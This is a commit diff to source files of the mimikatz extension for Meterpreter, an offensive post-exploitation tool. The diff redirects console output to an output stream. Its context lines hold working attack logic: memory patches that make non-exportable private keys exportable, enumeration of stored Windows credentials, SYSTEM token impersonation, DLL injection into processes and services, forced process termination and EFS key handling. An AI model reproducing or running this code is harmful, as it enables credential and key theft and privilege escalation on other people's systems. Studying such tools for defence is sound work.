wcout << L"\t\tExportabilité : " << (exportable ? L"OUI" : L"NON") << endl;
wcout << L"\t\tTaille clé : " << size << endl;
(*outputStream) << L"\t\tExportabilité : " << (exportable ? L"OUI" : L"NON") << endl;
(*outputStream) << L"\t\tTaille clé : " << size << endl;
}
if(exportCert)
@ -345,14 +345,14 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector<wstring> * argument
reussite = mod_crypto::CertCTXtoPFX(pCertContext, PFXFile, L"mimikatz");
wcout << L"\t\tExport privé dans \'" << PFXFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl;
(*outputStream) << L"\t\tExport privé dans \'" << PFXFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl;
if(!reussite)
{
wcout << L"\t\t\t" << mod_system::getWinError() << endl;
(*outputStream) << L"\t\t\t" << mod_system::getWinError() << endl;
}
}
}
else wcout << L"CryptAcquireCertificatePrivateKey : " << mod_system::getWinError() << endl;
else (*outputStream) << L"CryptAcquireCertificatePrivateKey : " << mod_system::getWinError() << endl;
}
if(exportCert)
@ -362,19 +362,19 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector<wstring> * argument
reussite = mod_crypto::CertCTXtoDER(pCertContext, DERFile);
wcout << L"\t\tExport public dans \'" << DERFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl;
(*outputStream) << L"\t\tExport public dans \'" << DERFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl;
if(!reussite)
{
wcout << L"\t\t\t" << mod_system::getWinError() << endl;
(*outputStream) << L"\t\t\t" << mod_system::getWinError() << endl;
}
}
delete certName;
}
CertCloseStore(hCertificateStore, CERT_CLOSE_STORE_FORCE_FLAG);
}
else wcout << L"CertOpenStore : " << mod_system::getWinError() << endl;
else (*outputStream) << L"CertOpenStore : " << mod_system::getWinError() << endl;
}
else wcout << L" introuvable !" << endl;
else (*outputStream) << L" introuvable !" << endl;
}
@ -460,7 +460,7 @@ bool mod_mimikatz_crypto::patchcapi(vector<wstring> * arguments)
if( mod_memory::genericPatternSearch(&ptr4001, LIBNAME_WALL_RSA, pattern4001, taillePattern4001, offsetPatch4001, FUNCNAM_WALL_EXPORT, true, true) &&
mod_memory::genericPatternSearch(&ptr4000, LIBNAME_WALL_RSA, pattern4000, taillePattern4000, offsetPatch4000, FUNCNAM_WALL_EXPORT, true, true))
{
wcout << L"Patterns CRYPT_EXPORTABLE | CRYPT_ARCHIVABLE et CRYPT_ARCHIVABLE trouvés !" << endl <<
(*outputStream) << L"Patterns CRYPT_EXPORTABLE | CRYPT_ARCHIVABLE et CRYPT_ARCHIVABLE trouvés !" << endl <<
L"Patch CRYPT_EXPORTABLE | CRYPT_ARCHIVABLE : " << (mod_memory::writeMemory(ptr4001, patch4001, taillePatch4001) ? L"OK" : L"KO") << endl <<
L"Patch CRYPT_ARCHIVABLE : " << (mod_memory::writeMemory(ptr4000, patch4000, taillePatch4000) ? L"OK" : L"KO") << endl;
}
@ -569,9 +569,9 @@ bool mod_mimikatz_crypto::patchcng(vector<wstring> * arguments)
mod_patch::patchModuleOfService(L"KeyIso", libName, pattern, taillePattern, patch, taillePatch, offsetPatch);
}
else wcout << L"Impossible d\'initialiser la CNG : " << mod_system::getWinError() << endl;
else (*outputStream) << L"Impossible d\'initialiser la CNG : " << mod_system::getWinError() << endl;
}
else wcout << L"Pas de CNG ?" << endl;
else (*outputStream) << L"Pas de CNG ?" << endl;
return true;
}

44
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_divers.cpp
View File

@ -34,15 +34,15 @@ bool mod_mimikatz_divers::nodetour(vector<wstring> * arguments)
PBYTE monNTDLLptr = reinterpret_cast<PBYTE>(GetProcAddress(GetModuleHandle(L"ntdll"), "NtOpenProcess"));
if(memcmp(monNTDLLptr + 8, monDetouredStub, sizeof(monDetouredStub)) == 0)
{
wcout << L"Détour trouvé et ";
(*outputStream) << L"Détour trouvé et ";
if(mod_memory::writeMemory(monNTDLLptr + 8 + sizeof(monDetouredStub) + sizeof(LONG) + *reinterpret_cast<PLONG>(monNTDLLptr + 8 + sizeof(monDetouredStub)), monSysEnterRetn, sizeof(monSysEnterRetn)))
wcout << L"patché :)";
(*outputStream) << L"patché :)";
else
wcout << L"NON patché :(";
wcout << endl;
(*outputStream) << L"NON patché :(";
(*outputStream) << endl;
}
else
wcout << L"Détour non trouvé" << endl;
(*outputStream) << L"Détour non trouvé" << endl;
}
return true;
}
@ -176,7 +176,7 @@ bool mod_mimikatz_divers::secrets(vector<wstring> * arguments)
if(CredEnumerate(NULL, flags, &credNb, &pCredential))
{
wcout << L"Nombre de secrets : " << credNb << endl;
(*outputStream) << L"Nombre de secrets : " << credNb << endl;
for(DWORD i = 0; i < credNb; i++)
{
@ -208,7 +208,7 @@ bool mod_mimikatz_divers::secrets(vector<wstring> * arguments)
type.assign(L"?");
}
wcout <<
(*outputStream) <<
L"TargetName : " << pCredential[i]->TargetName << L" / " << (pCredential[i]->TargetAlias ? pCredential[i]->TargetAlias : L"<NULL>") << endl <<
L"Type : " << type << L" (" << pCredential[i]->Type << L')' << endl <<
L"Comment : " << (pCredential[i]->Comment ? pCredential[i]->Comment : L"<NULL>") << endl <<
@ -218,7 +218,7 @@ bool mod_mimikatz_divers::secrets(vector<wstring> * arguments)
}
CredFree(pCredential);
}
else wcout << L"CredEnumerate : " << mod_system::getWinError() << endl;
else (*outputStream) << L"CredEnumerate : " << mod_system::getWinError() << endl;
return true;
}
@ -253,11 +253,11 @@ bool mod_mimikatz_divers::pitme(vector<wstring> * arguments)
if(arguments->size() < 1)
{
wcout << L"divers:::pitme file.pit [file.rdp]" << endl;
(*outputStream) << L"divers:::pitme file.pit [file.rdp]" << endl;
}
else
{
wcout << L" * Ouverture en lecture du fichier \'" << arguments->front() << L"\' : ";
(*outputStream) << L" * Ouverture en lecture du fichier \'" << arguments->front() << L"\' : ";
if(monFichierSource = _wfopen(arguments->front().c_str(), L"rb"))
{
fseek(monFichierSource, 0, SEEK_END);
@ -267,40 +267,40 @@ bool mod_mimikatz_divers::pitme(vector<wstring> * arguments)
fread(monBuffer, tailleFichierSource, 1, monFichierSource);
fclose(monFichierSource);
wcout << L"OK" << endl << L" * Déchiffrement n°1 : ";
(*outputStream) << L"OK" << endl << L" * Déchiffrement n°1 : ";
if(mod_crypto::genericDecrypt(monBuffer, tailleFichierSource, HARDCODED_KEY, sizeof(HARDCODED_KEY), CALG_RC4))
{
wcout << L"OK" << endl << L" * Déchiffrement n°2 : ";
(*outputStream) << L"OK" << endl << L" * Déchiffrement n°2 : ";
if(mod_crypto::genericDecrypt(monBuffer, tailleFichierSource - SUBKEY_SIZE, monBuffer + tailleFichierSource - SUBKEY_SIZE, SUBKEY_SIZE, CALG_RC4))
{
wcout << L"OK" << endl << L" * En-tête : ";
(*outputStream) << L"OK" << endl << L" * En-tête : ";
if(memcmp(monBuffer, HEADER_PIT, sizeof(HEADER_PIT)) == 0)
{
wcout << L"OK" << endl;
(*outputStream) << L"OK" << endl;
monBufferData = monBuffer + sizeof(HEADER_PIT);
tailleData = tailleFichierSource - sizeof(HEADER_PIT) - SUBKEY_SIZE;
if(arguments->size() > 1)
{
wcout << L" * Ouverture en écriture du fichier \'" << arguments->back() << L"\' : ";
(*outputStream) << L" * Ouverture en écriture du fichier \'" << arguments->back() << L"\' : ";
if(monFichierDestination = _wfopen(arguments->back().c_str(), L"wb"))
{
wcout << L"OK" << endl;
(*outputStream) << L"OK" << endl;
fwrite(monBufferData, tailleData, 1, monFichierDestination);
fclose(monFichierDestination);
}
else wcout << L"KO" << endl;
else (*outputStream) << L"KO" << endl;
}
else wcout << L" * Données : " << endl << endl << wstring(reinterpret_cast<char *>(monBufferData), reinterpret_cast<char *>(monBufferData + tailleData)) << endl;
else (*outputStream) << L" * Données : " << endl << endl << wstring(reinterpret_cast<char *>(monBufferData), reinterpret_cast<char *>(monBufferData + tailleData)) << endl;
}
else wcout << L"KO - différent de \'PIT\' ; " << mod_text::stringOfHex(HEADER_PIT, sizeof(HEADER_PIT)) << L" != " << mod_text::stringOfHex(monBuffer, sizeof(HEADER_PIT)) << endl;
else (*outputStream) << L"KO - différent de \'PIT\' ; " << mod_text::stringOfHex(HEADER_PIT, sizeof(HEADER_PIT)) << L" != " << mod_text::stringOfHex(monBuffer, sizeof(HEADER_PIT)) << endl;
}
else wcout << L"KO";
else (*outputStream) << L"KO";
}
else wcout << L"KO";
else (*outputStream) << L"KO";
delete [] monBuffer;
}
else wcout << L"KO" << endl;
else (*outputStream) << L"KO" << endl;
}
return true;
}

82
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_efs.cpp
View File

@ -23,19 +23,19 @@ bool mod_mimikatz_efs::infos(vector<wstring> * arguments)
if(QueryUsersOnEncryptedFile(arguments->front().c_str(), &pHashes) == ERROR_SUCCESS)
{
wcout << L"Utilisateur(s) déclaré(s) : " << pHashes->nCert_Hash << endl;
(*outputStream) << L"Utilisateur(s) déclaré(s) : " << pHashes->nCert_Hash << endl;
printInfos(pHashes);
FreeEncryptionCertificateHashList(pHashes);
}
else wcout << L"Erreur QueryUsersOnEncryptedFile : " << mod_system::getWinError() << endl;
else (*outputStream) << L"Erreur QueryUsersOnEncryptedFile : " << mod_system::getWinError() << endl;
if(QueryRecoveryAgentsOnEncryptedFile(arguments->front().c_str(), &pHashes) == ERROR_SUCCESS)
{
wcout << L"Agent(s) de recouvrement : " << pHashes->nCert_Hash << endl;
(*outputStream) << L"Agent(s) de recouvrement : " << pHashes->nCert_Hash << endl;
printInfos(pHashes);
FreeEncryptionCertificateHashList(pHashes);
}
else wcout << L"Erreur QueryRecoveryAgentsOnEncryptedFile : " << mod_system::getWinError() << endl;
else (*outputStream) << L"Erreur QueryRecoveryAgentsOnEncryptedFile : " << mod_system::getWinError() << endl;
}
return true;
@ -62,7 +62,7 @@ bool mod_mimikatz_efs::full(vector<wstring> * arguments)
bool isEFSMetaData = (monMarshaledStream->NameLenght == 2) && (monMarshaledStream->StreamName[0] == 0x1910);
wcout << endl <<
(*outputStream) << endl <<
L"Marshaled Stream :" << endl <<
L" * Taille : " << monMarshaledStream->Length << endl <<
L" * Flag : " << monMarshaledStream->Flag << endl <<
@ -77,34 +77,34 @@ bool mod_mimikatz_efs::full(vector<wstring> * arguments)
)
{
wcout << L"DataSegment : " << endl;
(*outputStream) << L"DataSegment : " << endl;
PBYTE StreamData = reinterpret_cast<PBYTE>(monDataSegment) + sizeof(EFS_STREAM_DATA_SEGMENT);
if(isEFSMetaData)
{
wcout << L" EFS Metadata :" << endl;
(*outputStream) << L" EFS Metadata :" << endl;
PEFS_METADATA_1 mesAttr = reinterpret_cast<PEFS_METADATA_1>(StreamData);
wcout << L" * Version EFS : " << mesAttr->EFS_Version << endl;
(*outputStream) << L" * Version EFS : " << mesAttr->EFS_Version << endl;
if(mesAttr->DDF_Offset)
{
wcout << L" * Utilisateur(s) déclaré(s) :" << endl;
(*outputStream) << L" * Utilisateur(s) déclaré(s) :" << endl;
fullInfosFromEFS_KEY_LIST(mesAttr, mesAttr->DDF_Offset, &Fek);
}
if(mesAttr->DRF_Offset)
{
wcout << L" * Agent(s) de recouvrement :" << endl;
(*outputStream) << L" * Agent(s) de recouvrement :" << endl;
fullInfosFromEFS_KEY_LIST(mesAttr, mesAttr->DRF_Offset, &Fek);
}
}
else
{
wcout << L" DATA :" << endl;
(*outputStream) << L" DATA :" << endl;
if(!monMarshaledStream->Flag)
{
wcout << L" DATA Segment Encryption Header :" << endl;
(*outputStream) << L" DATA Segment Encryption Header :" << endl;
PEFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER monSegEncHead = reinterpret_cast<PEFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER>(StreamData);
wcout <<
(*outputStream) <<
L" * Length : " << monSegEncHead->Length << endl <<
L" * StartingFile_Offset : " << monSegEncHead->StartingFile_Offset << endl <<
L" * BytesWithinStreamSize : " << monSegEncHead->BytesWithinStreamSize << endl <<
@ -118,33 +118,33 @@ bool mod_mimikatz_efs::full(vector<wstring> * arguments)
PEFS_EXTENDED_HEADER monExtHeader = reinterpret_cast<PEFS_EXTENDED_HEADER>(reinterpret_cast<PBYTE>(monSegEncHead) + FIELD_OFFSET(EFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER, DataBlockSizes) + (sizeof(DWORD) * monSegEncHead->NumberOfDataBlocks));
if(monExtHeader->EXTD_Number == 'DTXE')
{
wcout << L" * Extended Header Flag : " << monExtHeader->Flags << endl;
(*outputStream) << L" * Extended Header Flag : " << monExtHeader->Flags << endl;
}
for(DWORD block = 0; block < monSegEncHead->NumberOfDataBlocks; block++)
{
wcout << L" -> Block " << block+1 << L" ; taille : " << monSegEncHead->DataBlockSizes[block] << endl;
(*outputStream) << L" -> Block " << block+1 << L" ; taille : " << monSegEncHead->DataBlockSizes[block] << endl;
PBYTE mesDatas = reinterpret_cast<PBYTE>(StreamData) + monSegEncHead->Length;
wcout << mod_text::stringOfHex(mesDatas, monSegEncHead->DataBlockSizes[block], 16) << endl;
(*outputStream) << mod_text::stringOfHex(mesDatas, monSegEncHead->DataBlockSizes[block], 16) << endl;
if(Fek);
}
}
else
{
wcout << L"TODO Data" << endl;
(*outputStream) << L"TODO Data" << endl;
}
}
}
}
}
else wcout << L"Erreur ReadEncryptedFileRaw : " << mod_system::getWinError() << endl;
else (*outputStream) << L"Erreur ReadEncryptedFileRaw : " << mod_system::getWinError() << endl;
free(sba.tableau);
CloseEncryptedFileRaw(pvContext);
}
else wcout << L"Erreur OpenEncryptedFileRaw : " << mod_system::getWinError() << endl;
else (*outputStream) << L"Erreur OpenEncryptedFileRaw : " << mod_system::getWinError() << endl;
}
return true;
}
@ -154,20 +154,20 @@ bool mod_mimikatz_efs::toraw(vector<wstring> * arguments)
if(arguments->size() == 2)
{
PVOID pvContext = NULL;
wcout << L"Ouverture de : " << arguments->front() << endl;
(*outputStream) << L"Ouverture de : " << arguments->front() << endl;
if(OpenEncryptedFileRaw(arguments->front().c_str(), 0, &pvContext) == ERROR_SUCCESS)
{
wcout << L"Vers : " << arguments->back() << endl;
(*outputStream) << L"Vers : " << arguments->back() << endl;
HANDLE hFile = CreateFile(arguments->back().c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
if(ReadEncryptedFileRaw(ExportToFileCallback, &hFile, pvContext) == ERROR_SUCCESS)
{
wcout << L" * Export OK" << endl;
(*outputStream) << L" * Export OK" << endl;
}
else wcout << L"* Erreur ReadEncryptedFileRaw : " << mod_system::getWinError() << endl;
else (*outputStream) << L"* Erreur ReadEncryptedFileRaw : " << mod_system::getWinError() << endl;
CloseHandle(hFile);
CloseEncryptedFileRaw(pvContext);
}
else wcout << L"Erreur OpenEncryptedFileRaw : " << mod_system::getWinError() << endl;
else (*outputStream) << L"Erreur OpenEncryptedFileRaw : " << mod_system::getWinError() << endl;
}
return true;
}
@ -179,7 +179,7 @@ void mod_mimikatz_efs::printInfos(PENCRYPTION_CERTIFICATE_HASH_LIST hashList)
wstring user;
mod_secacl::simpleSidToString(hashList->pUsers[i]->pUserSid, &user);
wcout <<
(*outputStream) <<
L" * Nom : " << user << endl <<
L" * Nom simple : " << hashList->pUsers[i]->lpDisplayInformation << endl <<
L" * Hash du certificat : " << mod_text::stringOfHex(hashList->pUsers[i]->pHash->pbData, hashList->pUsers[i]->pHash->cbData) << endl <<
@ -208,7 +208,7 @@ DWORD WINAPI mod_mimikatz_efs::ExportToFileCallback(PBYTE pbData, PVOID pvCallba
{
if(ulLength)
{
wcout << L" - Lecture d\'un bloc de : " << ulLength << endl;
(*outputStream) << L" - Lecture d\'un bloc de : " << ulLength << endl;
DWORD dwBytesWritten = 0;
if(WriteFile(*reinterpret_cast<PHANDLE>(pvCallbackContext), pbData, ulLength, &dwBytesWritten, NULL) && (ulLength == dwBytesWritten))
return ERROR_SUCCESS;
@ -226,7 +226,7 @@ bool mod_mimikatz_efs::fullInfosFromEFS_KEY_LIST(PEFS_METADATA_1 header, LONG Ke
DWORD previousSize = sizeof(PEFS_KEY_LIST);
for(DWORD i = 0; i < monHead->Length; i++)
{
wcout << endl << L" Champ de données " << (i + 1) << L" :" << endl;
(*outputStream) << endl << L" Champ de données " << (i + 1) << L" :" << endl;
monHeader = reinterpret_cast<PEFS_KEY_LIST_ENTRY>((PBYTE) monHeader + previousSize);
PEFS_PUBLIC_KEY_INFORMATION monCredHeader = reinterpret_cast<PEFS_PUBLIC_KEY_INFORMATION>(reinterpret_cast<PBYTE>(monHeader) + monHeader->PKI_Offset);
@ -235,11 +235,11 @@ bool mod_mimikatz_efs::fullInfosFromEFS_KEY_LIST(PEFS_METADATA_1 header, LONG Ke
mod_secacl::simpleSidToString((reinterpret_cast<PBYTE>(monCredHeader) + monCredHeader->OwnerSID_offset), &user);
else user.assign(L"(null)");
wcout << L" * Utilisateur : " << user << endl;
(*outputStream) << L" * Utilisateur : " << user << endl;
fullInfosFromEFS_CERTIFICATE_DATA(monCredHeader, monCredHeader->Certificate_offset);
PBYTE Encrypted_FEK = reinterpret_cast<PBYTE>(monHeader) + monHeader->Enc_FEK_Offset;
wcout <<
(*outputStream) <<
L" * Flags : " << monHeader->Flags << endl <<
L" * FEK (chiffrée) : " << endl <<
L" -> Taille : " << monHeader->Enc_FEK_Length << endl <<
@ -256,7 +256,7 @@ bool mod_mimikatz_efs::fullInfosFromEFS_KEY_LIST(PEFS_METADATA_1 header, LONG Ke
if (CryptDecrypt(maCle, 0, TRUE, 0, Encrypted_FEK, &taille) )
{
*pFek = reinterpret_cast<PEFS_FEK>(Encrypted_FEK);
wcout <<
(*outputStream) <<
L" * FEK (clair) : " << endl <<
L" -> Taille : " << (*pFek)->Key_Lenght << endl <<
L" -> Algorithme : " << (*pFek)->Algorithm << endl <<
@ -265,7 +265,7 @@ bool mod_mimikatz_efs::fullInfosFromEFS_KEY_LIST(PEFS_METADATA_1 header, LONG Ke
endl;
}
else
wcout << mod_system::getWinError() << endl;
(*outputStream) << mod_system::getWinError() << endl;
}
CryptReleaseContext(hCryptKeyProv, 0);
}*/
@ -280,20 +280,20 @@ void mod_mimikatz_efs::fullInfosFromEFS_CERTIFICATE_DATA(PEFS_PUBLIC_KEY_INFORMA
{
PEFS_CERTIFICATE_DATA monThCertificate = reinterpret_cast<PEFS_CERTIFICATE_DATA>(reinterpret_cast<PBYTE>(header) + header->Certificate_offset);
wcout << L" -> Nom affiché : ";
(*outputStream) << L" -> Nom affiché : ";
if(monThCertificate->DisplayName_Offset)
wcout << reinterpret_cast<wchar_t *>(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->DisplayName_Offset);
wcout << endl;
(*outputStream) << reinterpret_cast<wchar_t *>(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->DisplayName_Offset);
(*outputStream) << endl;
wcout << L" -> Provider : ";
(*outputStream) << L" -> Provider : ";
if(monThCertificate->ProviderName_Offset)
wcout << reinterpret_cast<wchar_t *>(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->ProviderName_Offset);
wcout << endl;
(*outputStream) << reinterpret_cast<wchar_t *>(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->ProviderName_Offset);
(*outputStream) << endl;
wcout << L" -> Container : ";
(*outputStream) << L" -> Container : ";
if(monThCertificate->ContainerName_Offset)
wcout << reinterpret_cast<wchar_t *>(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->ContainerName_Offset);
wcout << endl;
(*outputStream) << reinterpret_cast<wchar_t *>(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->ContainerName_Offset);
(*outputStream) << endl;
wcout << L" -> Empreinte : " << mod_text::stringOfHex(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->CertificateThumbprint, monThCertificate->CertificateThumbprint_Length) << endl;
(*outputStream) << L" -> Empreinte : " << mod_text::stringOfHex(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->CertificateThumbprint, monThCertificate->CertificateThumbprint_Length) << endl;
}

54
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_handle.cpp
View File

@ -42,39 +42,39 @@ bool mod_mimikatz_handle::list(vector<wstring> * arguments)
if(isToken || isProcess)
{
wcout << setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" ";
(*outputStream) << setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" ";
if(isProcessList)
{
mod_process::KIWI_PROCESSENTRY32 * processHote = new mod_process::KIWI_PROCESSENTRY32();
if(mod_process::getProcessEntryFromProcessId(monHandle->ProcessId, processHote, mesProcess))
wcout << setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right;
(*outputStream) << setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right;
delete processHote;
}
wcout << L" -> " << setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' << tokenType << L'\t';
(*outputStream) << L" -> " << setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' << tokenType << L'\t';
if(isToken)
{
wstring userName, domainName;
if(mod_secacl::tokenUser(nouveauHandle, &userName, &domainName))
wcout << L'\t' << domainName << L'\\' << userName ;
else wcout << mod_system::getWinError();
(*outputStream) << L'\t' << domainName << L'\\' << userName ;
else (*outputStream) << mod_system::getWinError();
}
else if(isProcess)
{
DWORD monPid = GetProcessId(nouveauHandle);
wcout << monPid;
(*outputStream) << monPid;
if(isProcessList)
{
mod_process::KIWI_PROCESSENTRY32 * processKiwi = new mod_process::KIWI_PROCESSENTRY32();
if(mod_process::getProcessEntryFromProcessId(monPid, processKiwi, mesProcess))
wcout << L'\t' << processKiwi->szExeFile;
(*outputStream) << L'\t' << processKiwi->szExeFile;
delete processKiwi;
}
}
wcout << endl;
(*outputStream) << endl;
}
}
CloseHandle(nouveauHandle);
@ -83,7 +83,7 @@ bool mod_mimikatz_handle::list(vector<wstring> * arguments)
}
}
}
else wcout << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl;
delete mesHandles;
@ -127,7 +127,7 @@ bool mod_mimikatz_handle::processStop(vector<wstring> * arguments)
{
if(_wcsicmp(processKiwi->szExeFile.c_str(), monProcessName->c_str()) == 0)
{
wcout <<
(*outputStream) <<
setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" " <<
setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right << L" -> " <<
setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' <<
@ -135,34 +135,34 @@ bool mod_mimikatz_handle::processStop(vector<wstring> * arguments)
;
wcout << L"\tTerminate Process - ";
(*outputStream) << L"\tTerminate Process - ";
if(TerminateProcess(nouveauHandle, ERROR_SUCCESS) != 0)
{
wcout << L"OK";
(*outputStream) << L"OK";
}
else
{
wcout << L"KO ; " << mod_system::getWinError() << endl <<
(*outputStream) << L"KO ; " << mod_system::getWinError() << endl <<
L"\tJob : ";
if(HANDLE monObject = CreateJobObject(NULL, NULL))
{
if(AssignProcessToJobObject(monObject, nouveauHandle))
{
wcout << L"TerminateJobObject - ";
(*outputStream) << L"TerminateJobObject - ";
if(TerminateJobObject(monObject, ERROR_SUCCESS) != 0)
{
wcout << L"OK";
(*outputStream) << L"OK";
}
else wcout << L"KO ; " << mod_system::getWinError();
else (*outputStream) << L"KO ; " << mod_system::getWinError();
}
else wcout << L"AssignProcessToJobObject - KO ; " << mod_system::getWinError();
else (*outputStream) << L"AssignProcessToJobObject - KO ; " << mod_system::getWinError();
CloseHandle(monObject);
}
}
wcout << endl;
(*outputStream) << endl;
}
}
}
@ -177,7 +177,7 @@ bool mod_mimikatz_handle::processStop(vector<wstring> * arguments)
}
}
}
else wcout << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl;
delete mesHandles;
@ -219,7 +219,7 @@ bool mod_mimikatz_handle::tokenImpersonate(vector<wstring> * arguments)
{
if(_wcsicmp(userName.c_str(), (arguments->empty() ? L"system" : arguments->front().c_str())) == 0)
{
wcout <<
(*outputStream) <<
setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" " <<
setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right << L" -> " <<
setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' <<
@ -229,22 +229,22 @@ bool mod_mimikatz_handle::tokenImpersonate(vector<wstring> * arguments)
{
if(ImpersonateLoggedOnUser(nouveauHandle))
{
wcout << L"ok !!" << endl;
(*outputStream) << L"ok !!" << endl;
break;
}
else
{
wcout << L"ko - ImpersonateLoggedOnUser ; " << mod_system::getWinError() << endl;
(*outputStream) << L"ko - ImpersonateLoggedOnUser ; " << mod_system::getWinError() << endl;
}
}
else
{
wcout << L"ko - mod_secacl::exchangeDupToken ; " << mod_system::getWinError() << endl;
(*outputStream) << L"ko - mod_secacl::exchangeDupToken ; " << mod_system::getWinError() << endl;
}
}
}
else wcout << mod_system::getWinError();
else (*outputStream) << mod_system::getWinError();
}
delete processHote;
}
@ -256,7 +256,7 @@ bool mod_mimikatz_handle::tokenImpersonate(vector<wstring> * arguments)
}
}
}
else wcout << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl;
delete mesHandles;
@ -284,7 +284,7 @@ bool mod_mimikatz_handle::nullAcl(vector<wstring> * arguments)
toACL = find(arguments->begin(), arguments->end(), tokenType) != arguments->end();
if(toACL)
wcout << monHandle->ProcessId << L'\t' << monHandle->Handle << L'\t' << tokenType << L"\t\t" << (mod_secacl::nullSdToHandle(&nouveauHandle) ? L"NULL !" : L"KO") << endl;
(*outputStream) << monHandle->ProcessId << L'\t' << monHandle->Handle << L'\t' << tokenType << L"\t\t" << (mod_secacl::nullSdToHandle(&nouveauHandle) ? L"NULL !" : L"KO") << endl;
}
CloseHandle(nouveauHandle);
}
@ -292,7 +292,7 @@ bool mod_mimikatz_handle::nullAcl(vector<wstring> * arguments)
}
}
}
else wcout << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl;
delete mesHandles;

8
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_hash.cpp
View File

@ -21,9 +21,9 @@ bool mod_mimikatz_hash::lm(vector<wstring> * arguments)
chaine = arguments->front();
if(mod_hash::lm(&chaine, &hash))
wcout << L"LM(\'" << chaine << L"\') = " << hash << endl;
(*outputStream) << L"LM(\'" << chaine << L"\') = " << hash << endl;
else
wcout << L"Erreur de calcul du hash LM" << endl;
(*outputStream) << L"Erreur de calcul du hash LM" << endl;
return true;
}
@ -35,8 +35,8 @@ bool mod_mimikatz_hash::ntlm(vector<wstring> * arguments)
chaine = arguments->front();
if(mod_hash::ntlm(&chaine, &hash))
wcout << L"NTLM(\'" << chaine << L"\') = " << hash << endl;
(*outputStream) << L"NTLM(\'" << chaine << L"\') = " << hash << endl;
else
wcout << L"Erreur de calcul du hash NTLM" << endl;
(*outputStream) << L"Erreur de calcul du hash NTLM" << endl;
return true;
}

8
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_impersonate.cpp
View File

@ -13,12 +13,12 @@ vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_impersonate::getMimiKatz
}
bool mod_mimikatz_impersonate::revert(vector<wstring> * arguments)
{
wcout << L"RevertToSelf : ";
(*outputStream) << L"RevertToSelf : ";
if(RevertToSelf())
wcout << L"ok";
(*outputStream) << L"ok";
else
wcout << L"ko ; " << mod_system::getWinError();
wcout << endl;
(*outputStream) << L"ko ; " << mod_system::getWinError();
(*outputStream) << endl;
return true;
}

28
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_inject.cpp
View File

@ -24,10 +24,10 @@ bool mod_mimikatz_inject::process(vector<wstring> * arguments)
mod_process::KIWI_PROCESSENTRY32 monProcess;
if(mod_process::getUniqueForName(&monProcess, &processName))
{
wcout << L"PROCESSENTRY32(" << processName << L").th32ProcessID = " << monProcess.th32ProcessID << endl;
(*outputStream) << L"PROCESSENTRY32(" << processName << L").th32ProcessID = " << monProcess.th32ProcessID << endl;
injectInPid(monProcess.th32ProcessID, fullLib);
}
else wcout << L"Trop, ou pas de processus : \'" << processName << L"\' mod_process::getUniqueProcessForName : " << mod_system::getWinError() << endl;
else (*outputStream) << L"Trop, ou pas de processus : \'" << processName << L"\' mod_process::getUniqueProcessForName : " << mod_system::getWinError() << endl;
return true;
}
@ -40,11 +40,11 @@ bool mod_mimikatz_inject::service(vector<wstring> * arguments)
mod_service::KIWI_SERVICE_STATUS_PROCESS monService;
if(mod_service::getUniqueForName(&monService, &serviceName))
{
wcout << L"SERVICE(" << serviceName << L").serviceDisplayName = " << monService.serviceDisplayName << endl;
wcout << L"SERVICE(" << serviceName << L").ServiceStatusProcess.dwProcessId = " << monService.ServiceStatusProcess.dwProcessId << endl;
(*outputStream) << L"SERVICE(" << serviceName << L").serviceDisplayName = " << monService.serviceDisplayName << endl;
(*outputStream) << L"SERVICE(" << serviceName << L").ServiceStatusProcess.dwProcessId = " << monService.ServiceStatusProcess.dwProcessId << endl;
injectInPid(monService.ServiceStatusProcess.dwProcessId, fullLib);
}
else wcout << L"Service unique introuvable : \'" << serviceName << L"\' ; mod_service::getUniqueForName : " << mod_system::getWinError() << endl;
else (*outputStream) << L"Service unique introuvable : \'" << serviceName << L"\' ; mod_service::getUniqueForName : " << mod_system::getWinError() << endl;
return true;
}
